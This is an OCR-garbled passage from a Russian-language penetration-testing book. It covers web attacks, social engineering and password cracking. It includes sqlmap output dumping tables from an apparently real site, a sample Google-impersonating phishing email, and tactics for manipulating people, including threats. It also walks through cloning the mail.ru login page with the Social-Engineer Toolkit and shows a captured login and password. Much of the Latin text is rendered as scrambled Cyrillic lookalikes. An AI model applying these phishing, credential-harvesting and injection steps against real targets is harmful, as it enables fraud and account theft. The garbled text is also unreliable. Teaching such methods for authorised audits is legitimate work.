гооТ@ка1і:~# зрітар -и НТТр://ммм. ммм.тусогр.ог§:80/тосіеІ5_сіеТаі1.рНр?ісі=2 
- -ЬЬт5=тузя1 --сіитр --ТНгеасІ5=5 

[10:37:31] [INРО] ТезТіп§ соппесТіоп То ТМе Таг§еТ 1ІК1 

[10:37:35] [ІМЕО] сНескіп§ ІГ ТНе Таг§еТ із ргоТесТесІ Ьу зоте кіпсі оГ ИАЕ/ІР5/ІР5 
[10:37:35] [ІМЕО] ТезТіп§ ІТ ТНе Таг§еТ 1ІК1 із зТаЫе 

[10:37:36] [ІлІАКЫІМС] Таг§еТ 1ІК1 із пот зТаЫе. зяітар мііі Ьазе ТНе ра§е сотрагізоп 
оп а зеяиепсе таТсНег. ІТ по сіупатіс пог іпз'есТаЬІе рагатеТегз аге сіеТесТесІ, ог 
іп сазе оТ зипк гезиІТз, геТег То изег'з тапиаі рага§гарН 'Ра§е сотрагізоп' апсі 
ргоѵісіе а зТгіп§ ог ге§и1аг ехргез5іоп То таТсН оп 
Ном сіо уои мапТ То ргосеесі? [(С)опТіпие/(з)Тгіп§/(г)е§ех/(я)иіТ] 

[10:37:40] [ІМЕО] ТезТіп§ ІТ СЕТ рагатеТег ' ісі' із сіупатіс 

[10:37:40] [ІМЕО] сопТігтіп§ ТНаТ СЕТ рагатеТег 'ісГ із сіупатіс 

[10:37:45] [ІМЕО] СЕТ рагатеТег ' ісі' із сіупатіс 

[10:37:46] [ІлІАКЫІМС] геГІесТіѵе ѵаіие(з) Тоипсі апсі Ті1Тегіп§ оиТ 

[10:37:46] [ІМЕО] НеигізТіс (Ьазіс) ТезТ зНомз ТНаТ СЕТ рагатеТег 'ісГ ті§НТ Ье 

Іпз'есТаЬІе 

[10:37:46] [ІМЕО] ТезТіп§ Гог 5()1 іпзесТіоп оп СЕТ рагатеТег ' ісі' 

[10:37:46] [ІМЕО] ТезТіп§ 'АМР Ьооіеап-Ьазесі Ыіпсі - ІлІНЕКЕ ог НАѴІМО сіаизе’ 
[10:37:53] [ІМЕО] СЕТ рагатеТег 'ісі' арреагз То Ье 'АМР Ьооіеап-Ьазесі Ыіпсі - ІлІНЕКЕ 
ог НАѴІМО сіаизе' іпзесТаЬІе 

[10:37:53] [ІМЕО] ТезТіп§ 'Му5<21 >= 5.0 АМР еггог-ЬазесІ - ИНЕКЕ, НАѴІМО, ОКРЕК ВѴ 
ог ОКОУР ВѴ сіаизе (Р100К)' 


РаТаЬазе: сІЫ39202_ТгиззагТ 
ТаЫе: аѵаі1аЬ1е_іта§ез 
[6698 епТгіез] 

+-+-+-+ - + 

| іта§е_ісі | аѵаі1аЬ1е_ісІ | Гиіі | ТНитЬпаіІ 

+ - + - + - + - + 


[12:18:57] [ІлІАКЫІМО] сопзоіе оиТриТ мііі Ье ТгіттесІ То ІазТ 256 гомз сіие 
ТаЫе зіге 


6540 

| 991 

| тхГ4§т9і7і_Ги11.зр§ 

1 

тхР4§т9і7і_ТНитЬ.зр§ 

6541 

1 992 

| 4НтГх9тлут_Ги11.зр§ 

1 

4НтГх9тлут_ТНитЬ.зр§ 

6542 

1 992 

1 598ѵ8оТ15_Ги11.зр§ 

1 

з98ѵ8оТ15_ТНитЬ.зр§ 

6543 

1 992 

| 31яЬу9ѵггя_Ги11.зр§ 

1 

31яЬу9ѵггл_ТНитЬ.зр§ 

6544 

1 992 

| еТ8с2хрГ12_Ги11.зр§ 

1 

еТ8с2хрГ12_ТНитЬ.зр§ 

6545 

1 992 

| 4Тмпз601_Ги11.зр§ 

1 

4Тмпз601_ТНитЬ.зр§ 


То 1аг§е 
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| 6546 

| 992 

| Ьгг^2х-Р9693_ри11. 

| Ьтр2х-р9693_1ІіитЬ .зр§ | 

1 6547 

1 992 

| 51р4С]-( : 980_Ри11. ]р§ 

1 51р4сл-Р980_1:1и1тЬ.зр§ | 

1 6548 

993 

| И]9г6тхм1:_ри11.]р§ 

| 1л/з9г6тхм1_1МитЬ.зр§ 

1 6549 

1 993 

1 ууг§угрх]1:_-ри11.эрё 

| ууг§угрх]1_1МитЬ.зр§ | 

1 6550 

1 993 

| 11: л и кухЗг_-ри11. з р§ 

| 11]икух32_(:ИитЬ.зр§ 


ЭаІаЬазе: <1Ы39202_І:ги55аг1 
ТаЫе: §а11егу 
[0 епігіез] 

+ - + - + - + 

| тосіе1_ісі | §а11егу_ісі | $гс | 

+ - + - + - + 

+ - + - + - + 


ЭаІаЬазе: <1Ы39202_І:ги55аг1 
ТаЫе: -РіпізИез 
[0 епігіез] 


-+- 

тосіе1_ісі | -Ріпі 5 И_іс1 

- +- 

| 5ГС 

■+ - 

| -Ріпі5Н_пате 

- + - 

-+- 

■ +- 


Резюме 

\УеЪ-приложения, ввиду их сложности, являются одним из самых уязвимых 
мест. Перед началом их проверки будет очень полезным узнать основы \ѵеЪ- 
программирования. Познакомьтесь с НТМБ, ^ѵа, ^ѵаЗсгір!;, С55, РНР, ЗЦЬ. 
В этом деле вам помогут онлайн курсы (Соигзега, 1:<1Х) или специальная литера¬ 
тура. 

Благодаря уязвимостям типа Х55 вы сможете включать произвольный код в веб¬ 
приложение, украсть соокіе-файл и перенаправить пользователя на другой сайт, 
который может содержать вредоносный код или попросту быть фишинговым. 
Создание фишинговых сайтов рассмотрено в главе 5. 

Украв или подменив соокіе-файл, вы сможете выдать себя за другого пользователя, 
даже за администратора, и получить доступ к закрытой части сайта. 

Используя уязвимости в конфигурации серверов и плохо написанного кода, можно 
загрузить файл на сервер или получить доступ к системному файлу, который уже 
находится на этом сервере. Это даст возможность выполнять произвольные коман¬ 
ды на стороне сервера и получать доступ к критичной информации. 

Используйте 80к-ішъскціш для получения информации из баз данных. Обычно 
запросы, написанные на этом языке, вставляются в конце ІШБ целевой системы 
и позволяют считывать информацию из базы данных, а в некоторых случаях 
и вносить ее туда. Например, вы можете создать себе учетную запись, обладающую 
правами администратора. 















Социальная инженерия 


Мы уже достаточно много говорили о приемах и техниках, направленных на то, 
чтобы заставить информационную систему вести себя именно так, как нам надо, а в 
будущих главах расскажем об этом еще больше. Пришло время коснуться пробле¬ 
мы несколько с другой стороны — не с машинной, но с человеческой. Как бы тонко 
системный администратор под чутким руководством специалиста по информаци¬ 
онной безопасности ни настраивал свои приобретенные у самых именитых произ¬ 
водителей системы, в его сети всегда будет присутствовать слабое звено — человек. 

Социальная инженерия — это методы психологической манипуляции человеком, 
направленные на то, чтобы заставить жертву выполнить определенные действия 
в пользу атакующего. 

На самом деле пользователь — один из важнейших компонентов системы. Ведь 
все, что только ни создается, создается именно для него. У него есть доступ в си¬ 
стему, определенные привилегии, и он может осуществлять различные операции. 
Для атакующего непринципиален метод, благодаря которому он проникнет в сеть 
предприятия, важна лишь цель. Пользователь представляет собой первую линию 
защиты, и если она падет, то вся система рухнет довольно быстро. 

В данной главе мы рассмотрим некоторые техники, успешно применяемые для 
воздействия на пользователей, а также приведем различные примеры таких атак. 

На кого обратить внимание? 

Поскольку социальная инженерия во многих случаях не требует особых навыков, 
то круг людей, которые могут нанести вред организации, существенно увеличи¬ 
вается. 

Прежде всего, это, конечно, специалисты по информационной безопасности, си¬ 
стемные администраторы и другие ИТ-специалисты информацию о которых можно 
найти на одном из этапов проникновения в сеть. У этих людей достаточно широкие 
права доступа практически ко всем системам организации. 


Фазы атаки 89 


Разочарованные работники представляют собой большую угрозу для организации. 
Чаще всего это люди, недовольные нынешним положением дел в компании, своей 
должностью, окладом или, на их взгляд, несправедливо уволенные. По статистике, 
в США 75% сотрудников крадут что-либо у своего работодателя, а около 60% после 
ухода с работы забирают с собой данные о компании и клиентах. Чаще всего данные 
выносят на бумаге, жестких дисках, флеш-картах. 38% сотрудников используют 
персональную почту для обмена конфиденциальной информацией предприятия. 

Информационные брокеры. Даже если организацию не взламывают в данный 
момент, это не значит, что она не находится под наблюдением. Существуют целые 
компании, основной задачей которых является сбор персональной информации 
с целью последующей перепродажи. Например, Ьехіз№хі$, Кпо\ѵХ, МазІегРіІез 
и другие. С одной стороны, их можно отнести к разряду специалистов, но мы вы¬ 
делили их в отдельную категорию, чтобы еще раз подчеркнуть важность сбора как 
можно большего количества информации о целевой организации. 

Охотники за головами. Специальность появилась совсем не давно. Такие люди за¬ 
нимаются тем, что осуществляют подбор персонала для определенных организаций. 
У таких компаний есть целые сайты с вакансиями. Чем они могут быть полезны? 
Обычно такие люди достаточно хорошо знают структуру организации, для кото¬ 
рой они ищут людей. Ничто не мешает нам создать профиль — предположим, на 
ЬіпкесІІп, — который будет на 120% отвечать требованиям одной из вакансий. А во 
время собеседования, которое будет вначале проходить именно с рекрутинговой 
организацией, узнать больше о целевой компании. 


Фазы атаки 

Для начала посмотрим на картину в целом. Чтобы удачно провести нацеленную 
на человека атаку, необходимо: 

1) собрать как можно больше информации о нем; 

2) установить доверительные отношения; 

3) получить информацию; 

4) действовать. 

Сбор информации. Информацию можно собирать из различных источников — 
корпоративного сайта, социальных сетей, форумов, публикаций и даже из мусора. 

Что может быть прекраснее, чем копаться в мусорном баке вместе с лицами без 
определенного места жительства?! Но на самом деле из, казалось бы, никому не 
нужного мусора можно собрать достаточное количество информации для проведе¬ 
ния успешной атаки. Люди склонны выбрасывать ненужные вещи — счета, старые 
рецепты, выписки из банков, фотографии, резюме и многое другое. Используя эти 
данные, можно определить, чем человек болен, у какого врача лечится, где живет, 
персональный номер телефона, финансовое состояние и многое другое, что потом 
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можно использовать против него. Иногда можно неделями пытаться проникнуть 
в систему, потратив на это большое количество времени и средств, а потом за 
10 минут найти в мешке с мусором листик, на котором записаны логин и пароль. 

Для сбора информации из социальных сетей очень хорошо подойдет ранее рас¬ 
смотренный инструмент МаІ!е§о. 

Установление доверительных отношений. Для этого не обязательно общаться 
с человеком на протяжении нескольких лет. На самом деле все можно сделать 
в рамках одного телефонного звонка. Очень хорошо это демонстрирует пример со 
взломом АОЬ. Злоумышленник разговаривал с оператором службы технической 
поддержки более часа. Он установил доверительные отношения с сотрудником, 
а затем упомянул в разговоре о том, что продает свою машину. Сотрудник компа¬ 
нии проявил к ней интерес и попросил прислать фотографии. Злоумышленник 
прислал троянского коня и таким образом получил доступ ко внутренней сети 
организации. 

Получение информации. Чем больше информации получит злоумышленник от 
сотрудника, тем успешнее будет атака. В одном из случаев хакер позвонил по обще¬ 
доступному телефону компании и, представившись новым сотрудником, попросил 
телефон службы технической поддержки. Позвонив во внутреннюю службу, он, как 
новый сотрудник, узнал контакты директора ИТ-отдела якобы для согласования 
подключения к локальной сети. 

Эта история плавно переходит к следующей фазе — действию. Злоумышленник 
звонит в службу технической поддержки и представляется новым сотрудником, 
которого только недавно приняли на работу и еще не успели сделать ему аккаунт 
и выдать компьютер. Однако уже сегодня, буквально через пару минут, ему необ¬ 
ходимо выступить с презентацией перед начальниками отделов. Проблема в том, 
что он не может войти в систему, чтобы ее запустить, но он только что разговаривал 
с начальником ИТ-отдела (называет имя), и тот устно согласовал создание вре¬ 
менной учетной записи. Сотрудник службы технической поддержки очень хотела 
помочь новому сотруднику. К тому же это внутренняя служба и посторонние сюда 
не звонят, а кроме того, сам начальник ИТ-отдела дал согласие. В результате зло¬ 
умышленник получил доступ во внутреннюю сеть, не прибегая к использованию 
технических навыков. 

Манипулирование людьми 

Поскольку социальная инженерия подразумевает контакт человека с человеком, 
необходимо рассмотреть методы, при помощи которых можно заставить человека 
выполнить нужное действие. 

Установление временных рамок. Для этого можно начать диалог с фразы «это 
займет буквально несколько секунд» или, при личном контакте, можно, например, 
смотреть на часы. 
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Помощь. Один из наиболее эффективных способов заставить человека сделать 
что-то — просто попросить его о помощи. 

Поддержание эго. Люди любят быть правыми, и одна из техник как раз и заключа¬ 
ется в том, чтобы заставить человека поверить в свою правоту. Такой человек будет 
относиться более открыто к собеседнику и не будет воспринимать его как угрозу. 
Для этого надо просто не показывать свои знания в какой-либо области, а сказать, 
что вы в этом не разбираетесь, и попросить о помощи. 

Ценить собеседника. Еще один способ завоевать доверие собеседника — это ска¬ 
зать ему первым о том, что его помощь для вас неоценима, или подчеркнуть его 
глубокие знания о предмете обсуждения. 

Правильные вопросы. Задавайте верные вопросы, которые помогут получить 
больше информации. Если на заданный вопрос можно ответить только «да» или 
«нет», это не очень хорошо. Информативными будут такие вопросы, как «как?», 
«когда?» и «почему?». 

Моральные обязательства. Можно призывать человека сделать что-то потому, что 
он обязан это сделать ввиду, например, служебного положения. 

Угрозы. Не всегда социальные инженеры ведут милые беседы, иногда угроза — до¬ 
статочно действенный способ добиться желаемого. 

Вознаграждение. Предложить собеседнику нечто за что-то. Не обязательно это 
будут деньги. В ходе одного из исследований случайным прохожим предлагали 
сувениры в подарок, если они просто напишут свой пароль на листочке. Что инте¬ 
ресно, 90% сделали это. 

Нейролингвистическое программирование. Целая область психологии, исследую¬ 
щая способы манипулирования людьми. К сожалению, рассмотрение этих техник 
займет не одну сотню страниц и выходит за рамки нашей книги. 


Типы атак 

Претекстинг (рге1ех1іп§). В этом случае человек выдает себя за другого с целью 
получения от собеседника необходимой информации. Найдя в мусорном баке кви¬ 
танцию из банка, злоумышленник позвонил жертве, представившись сотрудником 
кредитного отдела, и сказал, что срок действия карты жертвы истекает и можно 
заказать новую. В ответ жертва сообщила, что это не так, и уточнила срок действия 
своей карты. Злоумышленник, сославшись на ошибку в системе, попросил уточ¬ 
нить еще и номер карты, после чего жертва сообщила и его. 

Подделка принадлежности. Очень хорошо работает в крупных организациях. 
В наше время несложно достать униформу сотрудника службы доставки. На ЕЪау 
фирменная куртка компании БНЕ свободно продается за 70 евро. Ни у кого не вы¬ 
зовет подозрения сотрудник службы доставки, который ходит по кабинетам и ищет 
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нужного человека. Хотя главной задачей для него будет найти незаблокированную 
рабочую станцию, оставленный без присмотра ноутбук или документы. 

Фишинг (рЬІ8Ьіп§). Главная идея данного метода состоит в создании поддельных 
писем и сайтов организаций для получения доступа к приватной информации. 

Например, злоумышленник составляет письмо, в котором говорится о том, что 
аккаунт пользователя в системе заблокирован и для разблокировки необходимо 
перейти по указанной ниже ссылке. Такие письма могут рассылаться от имени 
банков, почтовых и игровых сервисов, а также социальных сетей. 


Со діе і @отаіІ.сот ^ 

Здравствуйте! 

Ваш профиль @атаіІ сот может быть заблокирован, в связи с 

просьбой, поступившей к Администрации 01.12.2015 г. Согласно пункту 18.3 
пользовательского соглашения, Администрация оставляет за собой право временно 
приостановить, либо прекратить предоставление услуг, своевременно уведомив об этом 
пользователя. 


ізнакомиться с заявление» 


Ознакомтесь с заявкой, и если Вы не отправляли заявление на блокировку Вашего 
аккаунта, убедительная просьба отклонить его в течение 7 дней, иначе Ваш почтовый 
аккаунт будет заблокирован до выяснения обстоятельств. Ей присвоен номер 
20094709567875660. 


С уважением. 

команда Соодіе Аккаунтов 

Не оіеечайте па эго сообщение- Дополнительную информацию ищите в Справочном ценіре Соодіе 
Аккаумтос. 


Это обязательное уведомление, содержащее сведения о важных изменениях в используемом Вами сервисе 
или аккаунте Соодіе. 


Рис. 5.1. Фишинговое письмо, отправленное от имени Соодіе 


Есть техники, которые позволяют скрыть от пользователя реального получателя 
письма — например, указав в поле «Керіау-То» ас с о пп 1 :§@§о о у; I е. со пі , в то время 
как в поле «Зепбег» будет указан отправитель зотешег@§оо§1е.сот. Однако поль¬ 
зователи не склонны анализировать такие письма и увидят только то, что хочет 
составитель такого письма. 

Зачастую в такие письма добавляют вместо ссылок приложения, зараженные ви¬ 
русом. Еще один классический пример — «письма счастья». В этом случае пользо¬ 
ватель получает письмо, в котором говорится, что отправитель стал наследником 
огромного состояния и для его получения необходим поручитель, которому при¬ 
читается в качестве вознаграждения 40% от суммы наследства, что составит около 
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5 миллионов долларов США. Для того чтобы стать поручителем, необходимо вы¬ 
слать определенные данные. 

Зачастую такие письма не нацелены на какого-то конкретного человека. Отклик 
на них составляет около 0,1%, однако и этого будет достаточно. 

И, конечно же, поддельные сайты. Даже если пользователь очень опытен, его все 
равно можно обмануть. В наше время можно зарегистрировать домен на подстав¬ 
ного человека и получить 53Ь-сертификат на 60 дней, практически не проходя 
валидацию. 

Для примера возьмем банк с более-менее привычным названием, например 
Каійеізеп. По правилам Всемирной паутины, зарегистрировать домен гаіЯаізеп.сот 
нам никто не запретит. А большинство конечных пользователей не заметят под¬ 
мены. Как мы уже писали, для получения тестового ЗЗЬ-сертификата от Сотое!о 
нет необходимости проходить проверку на подлинность. Они проверят только то, 
что у человека есть доступ к почтовому ящику, находящемуся в этом домене. 

Дальше — дело техники. Например, можно разослать пользователям письмо 
с просьбой ознакомиться с новыми правилами банка, которые находятся по ука¬ 
занному адресу. 

Телефонный фишинг. В наше время автоматические АТС стали неотъемлемой 
частью сферы обслуживания. Для ускорения и упрощения идентификации многие 
банки просят своих клиентов идентифицироваться по телефону, а именно ввести 
номер клиента и пароль во время ожидания оператора. Атака при таком типе аутен¬ 
тификации достаточно проста. Конфигурируется АТС, которая фиксирует все 
действия пользователя. Далее всем пользователям рассылается письмо с просьбой 
связаться с банком по заранее подготовленному номеру. Пользователь будет зво¬ 
нить и вводить свои данные, после чего звонок будет сбрасываться. Конечно, после 
определенного количества раз это ему надоест, но к тому времени у атакующего уже 
скопится несколько паролей с его карты и номер пользователя. 

Приманка. При помощи этого приема была остановлена работа целого предпри¬ 
ятия, внутренняя сеть которого не имела связи с внешним миром. Злоумышленник 
оставил красивую, крупную и привлекающую внимание флеш-карту на парковке 
для сотрудников, один из которых заметил и подобрал ее. Естественно, это было 
утром, перед началом рабочего дня. Любопытство взяло верх, и сотрудник решил 
проверить ее содержимое прямо на рабочем месте. Как вы понимаете, на ней был 
вирус, который очень быстро распространился по внутренней сети. 

Подглядывание. Узнать пароль можно, просто подглядев его, по-английски это 
называется «зЬоиЫег зегіт§». Подглядеть пароль можно любым способом — через 
окно при наличии хорошей оптики, получив доступ к камерам наблюдения или 
просто заглянув через плечо. 

Проход «паровозиком» (1аі1§а1іи§). Используется для проникновения на защи¬ 
щенные объекты. Предположим, что на предприятии стоят турникеты и доступ 
осуществляется по электронным картам. Но если убедить одного из сотрудников 
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в том, что вы потеряли свою карту, а вам необходимо срочно попасть на совещание, 
то электронная система пропустит двоих человек сразу, если они будут проходить 
через турникет вплотную друг к другу. 

5осіаІ-Епдіпеег Тооікіі: 

Каіі Ііпих включает в себя фреймворк, предназначенный для планирования и про¬ 
ведения направленных на людей атак — проще говоря, для облегчения проведения 
социальной инженерии. 

Данный фреймворк содержит в себе огромные возможности. Продемонстрируем 
его работу на примере создания фишингового сайта. 


[ — ] ТРіе 5осіа1-Еп§іпеег ТооІкіТ (5ЕТ) [ — ] 

[ — ] СгеаТесІ Ьу: ОаѵісІ Кеппесіу (КеЫК) [ — ] 

Ѵегзіоп: 7.4.1 
Сосіепате: 'КесРіаг§есГ 

[ — ] Роііом из оп ТміТТег: @Тги5Тесі5ес [ — ] 

[—] Роііом те оп ТміТТег: @Наскіп§Оаѵе [—] 

[ — ] Нотера§е: РіТТр5://мим.Тги5ТесІ5ес. сот [ — ] 


Ідіеісоте То ТРіе 5осіа1-Еп§іпеег Тооікіі; (5ЕТ). 

ТРіе опе 5Тор 5Рюр Тог аіі оТ уоиг 5Е пеесІ5. 

Зоіп из оп ігс .Тгеепосіе. пеТ іп сРіаппеІ #5еТоо1кіТ 

ТРіе 5осіа1-Еп@іпеег ТооІкіТ І5 а ргосіисТ оТ Тги5ТесІ5ес. 

ѴІ5ІТ: РіТТр5://ммм.Тги5ТесІ5ес. сот 

ІТ'5 еа5у То ирсіаТе и5іп§ ТРіе РепТе5Тег5 Ргатемогк! (РТР) 

ѴІ5ІТ РіТТр5://§іТИиЬ.сот/Тги5ТесІ5ес/рТТ То ирсіаТе аіі уоиг ТооІ5І 

БеІесТ Тгот ТРіе тепи: 

1) 5осіа1-Еп§іпеегіп§ АТТаск5 

2) РепеТгаТіоп Те5Тіп§ (Ра5Т-Тгаск) 

3) ТРіігсІ РагТу МосІи1е5 

4) ІІрсІаТе ТРіе 5осіа1-Еп§іпеег ТооІкіТ 

5) ІІрсІаТе 5ЕТ сопТі§игаТіоп 

6) Неір, СгесІіТ5, апсі АЬоиТ 

99) ЕхіТ ТРіе 5осіа1-Еп§іпеег ТооІкіТ 
5еТ>1 


5е1есТ Тгот ТРіе тепи: 

1) 5реаг-РРіі5Рііп@ АТТаск ѴесТог5 

2) ІлІеЬ5ІТе АТТаск ѴесТог5 

3) ІпТесТіои5 Месііа бепегаТог 
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4) Сгеаіе а Рауіоасі апсі Еізіепег 

5) Мазз Маііег Аііаск 

6) Агсіиіпо-Вазесі Аііаск Ѵесіог 

7) Іл/ігеіезз Ассезз Роіпі Аііаск Ѵесіог 

8) ()КСос1е Сепегаіог Аііаск Ѵесііог 

9) РомегзЬеІІ Аііаск Ѵесіогз 

10) 5М5 5рооііп§ Аііаск Ѵесіог 

11) ТЬігсі Рагіу Мосіиіез 

99) Кеіигп Ьаск Іо іііе таіп тепи. 
зеі>2 


1) Іаѵа Арріеі Аііаск МеіЬосі 

2) Меіазріоіі Вгомзег Ехріоіі МеіЬосі 

3) Сгесіепіііаі Нагѵезіег Аііаск МеІіНосІ 

4) ТаЬпаЬЬіп§ Аііаск МеіЬосі 

5) ІлІеЬ Іаскіп§ Аііаск МеіЬосі 

6) Миііі-Аііаск ЫеЬ МеіЬосі 

7) Риіі Бсгееп Аііаск МеіЬосі 

8) НТА Аііаск МеіЬосі 

99) Кеіигп Іо Маіп Мепи 
зеі :меЬаііаск>3 


1) Іл/еЬ Тетріаіез 

2) 5ііе Сіопег 

3) Сизіот Ітрогі 

99) Кеіигп Іо ІлІеЬаііаск Мепи 
зеі :меЬаііаск>2 


[-] Сгесіепіііаі Ьагѵезіег мііі аііом уои іо иііііге іііе сіопе сараЬіІіііез міІЫп 
5ЕТ 

[-] іо Ьагѵезі сгесіепііаІ5 ог рагатеіегз ігот а меЬзііе аз меіі аз ріасе ІЬет іпіо 
а герогі 

[-] ТЫз орііоп із изесі іог мЬаі ІР іііе зегѵег мііі Р05Т іо. 

[-] Іі уои-’ге изіп§ ап ехіегпаі ІР, изе уоиг ехіегпаі ІР іог ііііз 

зеі:меЬаііаск> ІР асісігезз іог ІЬе Р05Т Ьаск іп Нагѵезіег/ТаЬпаЬЬіп§:127.0.0.1 


[-] 5ЕТ зиррогіз ЬоіИ НТТР апсі НТТР5 

[-] Ехатріе: Ыір://ммм.іЬІ5ізаІакезііе.сот 

зеі:меЬаііаск> Епіег іЬе игі Іо сіопе: Ыірз://таіі. ги/ 


[*] С1опіп@ іЬе меЬзііе: Ыірз://таі1.ги/ 

[*] ТЫз соиісі іаке а ІіІІІе ЫІ... 

РуіЬоп ОрепББЕ мазп-Ч сіеіесіесі ог Ьаз ап іпзіаііаііоп іззие, поіе іЬаі 55Е 
сотраііЬіІііу із пом іигпесі о ІІ 

ТЬе Ьезі мау іо изе іЬіз аііаск із іі изегпате апсі раззмогсі Іогт 
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Гіеісіз аге аѵаіІаЬІе. Ке^агсІІезз, і;ИІ5 саріигез аіі Р05Тз оп а меЬзііе. 

[*] АрасЬе І5 зеі; іо 0І\І - еѵегуіЬіп§ мііі Ье ріасесі іп уоиг меЬ гооі сіігесіогу оі 
арасЬе. 

[*] Рііез мііі Ье мгіііеп оиі іо 1:Гіе гооі сіігесііогу оі арасЬе. 

[*] АН Гііез аге мііЬіп уоиг АрасЬе Ьігесіогу зіпсе уои зресіііесі іі іо ОМ. 

[!] АрасЬе тау Ье поі гиппіп§, Ьо уои мапі 5ЕТ іо зіагі іЬе ргосезз? [у/п]: у 
[ ок ] 5іагііп§ арасЬе2 (ѵіа зузіетсіі): арасЬе2.зегѵісе. 

АрасЬе меЬзегѵег із зеі іо ОМ. Соруіп§ оѵег РНР -Рііе іо іЬе меЬзііе. 

Ріеазе поіе іЬаі аіі оиіриі Ггот іЬе Ьагѵезіег мііі Ье ГоипЬ ипсіег арасЬе_Ыг/ 
Ьагѵезіег_сІаіе. іхі 

Рееі ігее іо сизіотіге розі.рЬр іп іЬе /ѵаг/ммм/ЬітІ Ьігесіогу 
[*] АН іііез Ьаѵе Ьееп соріесі іо /ѵаг/ммм/ЬітІ 

[*] 5ЕТ із пом 1ізіепіп§ -Рог іпсотіп§ сгесіепііаіз. Ѵои сап сопігоі-с оиі оі іЬіз 
апсі сотріеіеіу ехіі 5ЕТ аі апуііте апЬ зіііі кеер іЬе аііаск §оіп§. 

[*] АН Рііез аге ІосаіеЬ ипсіег іЬе АрасЬе меЬ гооі сіігесіогу: /ѵаг/ммм/ЬітІ 
[*] АН Ріеісіз саріигез мііі Ье сіізріауесі Ьеіом. 

[Сгесіепііаі Нагѵезіег із пом 1ізіепіп§ Ьеіом...] 

На предыдущих шагах мы создали с помощью 8осіа1-Еп§іпеег Тооікіі точную 
копию главной страницы популярного почтового сервиса шаіі.ги. Как вы видите, 
для этого понадобилось только выбрать правильный пункт в меню и указать ІЖЬ 
страницы, которую мы хотим клонировать, а также ІР-адрес сервера, на который 
будет отправляться введенная пользователем информация. Данный фреймворк сам 
создал копию, запустил веб-сервер и разместил страницу в нужной директории. 
Теперь протестируем, откроем браузер и введем в адресную строку «ІосаІЬозі». 


/ 0 МаІІ. 


( ^) ® I ІосаІНозі 


МаіІ.Ки: почта, поиск в интернете, новости, игры - МогіІІа 


Ри: почта, поиск.. 


*''и 


Моьі Ѵыіеі] ▼ ІІІОГГегкіѵе Беилііу \КаІШішх \КаІіОось \КаІіТооІь ЩЕхрІоН-ОВ ^Аігиаск-пу 
мап.ни Почта Мой Мир одноклассники Игры знакомстоа нооости Поиск Вес проекты ▼ 

Поиск Н ИН I нрНКІН Картинки Пидео Прилежания Отняты 


И I Іочта 


СВ 


| д>таіі.ги»| 


| пард.п 


Яд был и пароль? 


У ЗаПОММИТЬ 


Реіисірацин в иочіе 

с удобным иніерфейсшч 


Новосибирск | Спорт 


Новосибирцы молились к Дань народного единства 

л ноября в массовом молѳбнѳ перед Казанской иконой & 
I Іовосибирске приняли участие сотни горожан и руковод 


Глава СО РАН осудил Новосибирский Технопарк 
Арктический холод накроет Новосибирск 

Мэр Новосибирска пообедал жилье іыснче человек до конца і ода 
Чиновник. Бвснлаінаи парковка дорою обходиіен жиіелнм юрода 
На выходных ГИБДД и рое еде і рейд 

Запрещен прием студентов в один из новосибирских институтов 

Безработный осужден за налет на ювелирный магазин 

Спорт Полузащитник «Зенита» отказался продлевать контракт с клубом 

Лото В России появился копий тип аотолодстао 

кино I іегооа. Лкдрссоа и ьопдарчук на премьере «Хорошего мальчика» 


Рис. 5.2. Клон главной страницы почтового сервиса шаіі.ги, размещенный 
на локальном компьютере 
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После того как пользователь вводит логин и пароль, его данные записываются 
в файл на локальном компьютере, а его самого система перенаправит на настоящий 
сайт. 

Сохраненные пользовательские данные: 

гооТ@ка1і:/ѵаг/миіл//И1:т1# саТ Магѵе5І:ег_2016-11-04\ 06\:38\: 11.337695.ТхС 
Аггау 
( 

[Оотаіп] => таіі.ги 
[І_о§іп] => зотеизег 
[Рагзмогсі] => 12345678 
[пем_аи1:Н_Рогт] = > 1 
[РготАссоипТ] => 1 
[заѵеаиТЬ] => 1 

) 

Резюме 

Человек является самым слабым звеном любой системы. А поскольку именно чело¬ 
век создает и использует ИС, то грамотно продуманная атака может помочь полу¬ 
чить доступ к самому защищенному серверу даже плохо подготовленному аудитору. 

На данном этапе вам пригодится информация, собранная о сотрудниках, особенно 
та, что есть в социальных сетях. На этом этапе хороши любые средства — от уста¬ 
новления дружеских отношений до просьб и запугиваний. 

Мы рекомендуем прочитать книгу Кевина Митника «Искусство обмана». В ней 
содержится много интересных примеров. Ознакомьтесь с основами социальной ин¬ 
женерии — это поможет грамотно манипулировать людьми. Не применяйте эти на¬ 
выки в повседневной жизни, используйте их только во время проведения аудитов. 

Не забывайте о фишинге. Грамотно созданное письмо от имени лица или органи¬ 
зации, которой доверяет цель, может заставить человека выслать все необходимые 
данные по почте. Грамотно созданная копия сайта также поможет нам без особых 
хлопот получить имена пользователей и пароли. 
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В современном мире существует довольно много видов аутентификации. Есть 
методы, использующие биометрические данные (сканирование отпечатка паль¬ 
ца, радужки, лица, голоса), дополнительные устройства (мобильный телефон, 
генератор паролей, смарт-карты). Также есть способы, учитывающие даже такие 
параметры, как СР5-координаты и манера набирать пароль на клавиатуре. И все 
же до сих пор самым популярным методом аутентификации является ввод логина 
и пароля. 

По умолчанию пара логин и пароль используется для аутентификации во всех 
системах. Будь то веб-приложение, операционная система или база данных. 

В этой главе мы поговорим о двух основных сценариях: 

1. В первом случае нам доступна только форма для ввода логина и пароля. 

2. Во втором случае мы получили доступ к базе данных, — не забывайте, что даже 
простой файл может считаться базой данных, — и видим только хеши паролей. 

Основные методы 

Для начала рассмотрим два основных метода атак на пароли. На самом деле суще¬ 
ствует множество способов взлома пароля, но все они — это в основном модифи¬ 
кации либо прямого перебора, либо перебора по словарю. 

Перебор паролей. Название метода говорит само за себя: в данном случае атакую¬ 
щий просто подбирает пароль. Вначале, например, перебираются все цифры от 0 до 
9, затем от 10 до 99, от 100 до 999 и т. д. Вручную подобрать пароль таким способом 
не представляется возможным, для этого используют специальное программное 
обеспечение, которое мы рассмотрим чуть позже. 

Атаки по словарю. Суть метода заключается в том, что атакующий подбирает 
пароль не случайным образом, а берет слова из заранее подготовленного файла 
с паролями. Разумеется, перебор, как и в предыдущем случае, не ведется вручную. 
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Работа со списками паролей 

Так где же взять файл с паролями? Можно найти в Интернете. Например, на сайте 
кир8://ткі.8киІІ8есигііу.огр/іпсІех.ркр?ШІе=Ра88№ОгсІ8 есть очень хорошая подборка 
словарей. Например, 500 самых популярных паролей или пароли пользователей 
таких популярных сервисов, как Ноітаіі и МуЗрасе. 

Но у таких словарей есть один недостаток. Большая часть таких словарей создается 
